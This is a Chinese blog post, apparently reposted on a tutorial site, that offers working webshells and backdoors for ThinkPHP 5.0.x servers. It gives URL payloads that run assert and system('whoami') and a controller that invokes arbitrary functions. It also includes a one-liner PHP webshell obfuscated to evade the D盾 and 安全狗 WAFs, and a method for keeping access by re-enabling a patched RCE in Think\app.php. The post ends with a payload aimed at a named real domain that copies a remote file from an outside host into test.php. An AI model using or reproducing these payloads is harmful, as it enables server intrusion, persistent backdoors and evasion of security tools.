thinkphp下的Webshell&&php过D盾一句话

血红的双手。 提交于 2020-05-04 05:29:32

 

环境:

  Thinkphp 5.0.15

  PHP version:7.0.12

  WAF: D盾 ,安全狗

  Thinkphp 采用 MVC 模式  核心:模块 -> 控制器 –> 方法

思路:利用已经有的think 类包库 去做一些事情

 

利用已有的功能,顺便对D盾 绕过 

方法:

Payload1:

http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[1]=phpinfo()

 

Payload2:

http://127.0.0.1/tp5.0.15/public/index.php/index?&f=call_user_func&shell[0]=assert&shell[1]=system(‘whoami’)

 

代码:

<?php
namespace app\index\controller;
use \think\App;
class index
{
   public function index($f,$shell)
   {
       $a=new App();
       $c=$a->invokeFunction($f,$shell);
       return '</br> sucess';

   }
}

关于用这个的来源:

 Thinkphp5 rce 漏洞 其中一个payload  是这样的

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

漏洞原因:默认没有开启强制路由,路由控制不严谨,可以执行自己需要的类库

在think 类库中找到自己需要的功能,进行触发调用

 

先贴一个不需要thinkphp 环境下 过D盾 和安全狗的 马

<?php
function invokeFunction($function, $vars = [])
{
    $reflect = new ReflectionFunction($function);

    return $reflect->invokeArgs($vars);
}

$function='a'.'ssert';
$vars=$_GET[1];

invokeFunction($function,$vars);


?>

 

 

还有一种思路,创建类或者函数,进行包含绕过,有兴趣的可以自己试一下。、

 

 

然后对于thinkphp 权限维持的思路,因为本身内核存在RCE, -这里假设打了补丁的RCE 被某洞获得到权限

演示以thinkphp 最新版本 5.0.24

 

在Think\app.php 文件内,把! 删掉 就可以继续RCE 了 (只是提供一种维持思路)

后来想了下,这样对整个站点都不安全了,不适合维持。可以在前面在加一段IF 开关条件  符合就不执行preg_math 这一段,对RCE的漏洞入口进行一个管理操作~

就可以继续任意执行了

 

tp 在 5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10。  在模板调用的时候 有任意文件包含漏洞,可以自己写一个,当作后门。

 

附赠:

关于thinkphp rce  绕WAF or 宝塔

 

这里用了宝塔做测试:

http://yishangtv.com/index.php?s=&echod=copy(%22http://www.letv.cloud/ad.txt%22,%22test.php%22)

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod

 

思路:绕敏感函数,和正则匹配

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!